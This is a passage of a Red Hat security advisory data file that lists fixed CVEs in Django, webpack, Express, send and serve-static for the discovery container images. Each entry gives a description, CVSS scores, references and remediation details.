"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "python-django: Potential denial-of-service vulnerability in django.utils.html.urlize() and AdminURLFieldWidget", }, { cve: "CVE-2024-42005", cwe: { id: "CWE-89", name: "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", }, discovery_date: "2024-08-02T02:08:30+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2302436", }, ], notes: [ { category: "description", text: "A flaw was found in Django. The QuerySet.values() and QuerySet.values_list() methods on models with a JSONField were subject to SQL injection in column aliases via a crafted JSON object key as a passed *arg.", title: "Vulnerability description", }, { category: "summary", text: "python-django: Potential SQL injection in QuerySet.values() and values_list()", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is considered of moderate severity rather than high or critical because it requires specific conditions to be exploitable. The potential for SQL injection exists only when QuerySet.values() or values_list() methods are used on models with a JSONField, and an attacker must have control over the JSON object keys passed as arguments. In typical use cases, these methods are often used with predefined or controlled data, limiting the attack surface. Furthermore, the impact is constrained to the manipulation of column aliases, rather than direct injection into more critical parts of the SQL query, reducing the overall risk compared to more direct forms of SQL injection vulnerabilities.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-42005", }, { category: "external", summary: "RHBZ#2302436", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302436", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-42005", url: "https://www.cve.org/CVERecord?id=CVE-2024-42005", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-42005", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-42005", }, { category: "external", summary: "https://www.djangoproject.com/weblog/2024/aug/06/security-releases/", url: "https://www.djangoproject.com/weblog/2024/aug/06/security-releases/", }, ], release_date: "2024-08-06T13:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "python-django: Potential SQL injection in QuerySet.values() and values_list()", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in 